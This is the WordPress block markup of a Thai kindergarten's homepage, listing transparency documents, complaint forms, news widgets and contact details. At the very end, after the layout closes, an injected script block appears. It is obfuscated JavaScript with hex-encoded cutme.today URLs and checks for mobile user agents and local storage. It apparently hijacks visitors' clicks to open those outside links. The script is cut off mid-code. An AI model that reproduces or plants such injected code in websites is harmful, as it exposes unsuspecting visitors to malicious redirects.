href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAg